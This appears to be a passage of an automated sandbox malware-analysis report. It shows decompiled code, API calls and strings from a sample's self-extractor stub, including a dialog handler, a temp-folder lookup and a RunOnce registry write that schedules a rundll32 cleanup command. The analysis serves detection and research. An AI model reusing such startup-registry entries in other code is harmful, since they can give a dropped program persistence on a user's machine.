                                                                                                                                                                                                        • Opcode Fuzzy Hash: 15bccdbc09b28ac740f14803f72cdffd6a89fdc805ac3800293a8de828666428
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F551C3703403017BEF64ABA89D8ABBB2AE8EB55740F10402BF941D55E5DFB88C438765
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00A934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xa991d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xa98584 = _t35;
                                                                                                                                                                                                        					E00A943D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xa98184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "photo660");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00A94FE0, 0, 0, 0xa98798);
                                                                                                                                                                                                        					 *0xa9879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E00A944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xa9858c);
                                                                                                                                                                                                        					_t38 =  *0xa98584; // 0x0
                                                                                                                                                                                                        					_t25 = E00A944B9(_t38, 0x4b2, 0xa91140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xa991d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xa9858c);
                                                                                                                                                                                                        						_t39 =  *0xa9879c; // 0x0
                                                                                                                                                                                                        						E00A93680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xa9858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xa9879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00A93535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00A93541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00A9355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00A91140,00000000,00000020,00000004), ref: 00A93590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00A935C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A935F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00A935F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00A93610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00A93617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00A93623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00A93637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00A93671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 2406144884-1757243477
                                                                                                                                                                                                        • Opcode ID: 49c6940822e7fabf4f6f3d5b0e7c054da1c29294c5b6523a819fddf7a3fbc449
                                                                                                                                                                                                        • Instruction ID: 8a0ff3adec95617880a87d126902c8af908d12abd783c9cfe4b1de12c7fc76b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49c6940822e7fabf4f6f3d5b0e7c054da1c29294c5b6523a819fddf7a3fbc449
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED318332340301BBDF209FA5AC4DE6B3AF5E79AB41F60461BF702952B0CE758902CA95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00A94224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E00A944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xa988c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xa987a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xa98598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00A94200;
                                                                                                                                                                                                        					_v28 = 0xa988c0;
                                                                                                                                                                                                        					 *0xa9a288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xa9a288(_t32, 0xa988c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xa988c0 != 0) {
                                                                                                                                                                                                        							E00A91680(0xa987a0, 0x104, 0xa988c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xa9a288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xa987a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xa988c0);
                                                                                                                                                                                                        					_t61 = 0xa988c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xa988c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xa988c0; // 0x1531181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xa988c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xa988c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A94236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A9424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A94263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A9427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00A988C0,?,00000001), ref: 00A9429F
                                                                                                                                                                                                        • CharPrevA.USER32(00A988C0,01531181,?,00000001), ref: 00A942C2
                                                                                                                                                                                                        • CharPrevA.USER32(00A988C0,00000000,?,00000001), ref: 00A942D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A94391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A943A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: c11f5c5cc6e33cf738071a5b855052f4a0eb9c9e01ede3ee57fdb8719d8053f5
                                                                                                                                                                                                        • Instruction ID: 03cca8148bfa5475ca4234ec23087fe852fffd6db836aff832bb2d9d5c9b65bd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c11f5c5cc6e33cf738071a5b855052f4a0eb9c9e01ede3ee57fdb8719d8053f5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A41C374B00204AFDF119BB4DC88AAE7BF4EB4A384F54456AE941AB251CF788C0387A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00A92773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00A91781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E00A9658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E00A9658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xa91140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00A91680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        0x00a928cd
                                                                                                                                                                                                        0x00a92837
                                                                                                                                                                                                        0x00a9285a
                                                                                                                                                                                                        0x00a9285c
                                                                                                                                                                                                        0x00a92865
                                                                                                                                                                                                        0x00a92892
                                                                                                                                                                                                        0x00a92895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92867
                                                                                                                                                                                                        0x00a92878
                                                                                                                                                                                                        0x00a9288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a9287a
                                                                                                                                                                                                        0x00a92880
                                                                                                                                                                                                        0x00a92885
                                                                                                                                                                                                        0x00a92897
                                                                                                                                                                                                        0x00a92899
                                                                                                                                                                                                        0x00a92899
                                                                                                                                                                                                        0x00a92878
                                                                                                                                                                                                        0x00a92865
                                                                                                                                                                                                        0x00a928a0
                                                                                                                                                                                                        0x00a928bf
                                                                                                                                                                                                        0x00a928c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a928c1
                                                                                                                                                                                                        0x00a92831
                                                                                                                                                                                                        0x00a927dd
                                                                                                                                                                                                        0x00a927d5
                                                                                                                                                                                                        0x00a928e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(6298F871,00000000,00000000,00000000), ref: 00A927A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00A927B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00A927BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A92870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A928A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A928AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A928B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A927E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                        • Instruction ID: 0d23a77eda34f2c0fe8087a8abffe9b9315949efda8f11b62a32a3f63311a099
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a59aecb514c2d7d1195e2f63776421f9450845e7fa764a178928852599c2495a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24416071B00128ABDF24DB649C85BFA77FDEF65700F1480AAF549D2110DB708E868FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00A92267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xa98004; // 0x6298f871
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xa98530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E00A9658A( &_v268, 0x104, 0xa91140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        							E00A9171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00A96CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00a92381
                                                                                                                                                                                                        0x00a92381
                                                                                                                                                                                                        0x00a9238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A922A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00A922D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A922F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A92305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A9236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A9237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • wextract_cleanup0, xrefs: 00A9227C, 00A922CD, 00A92363
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A9232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A92321
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A92299
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
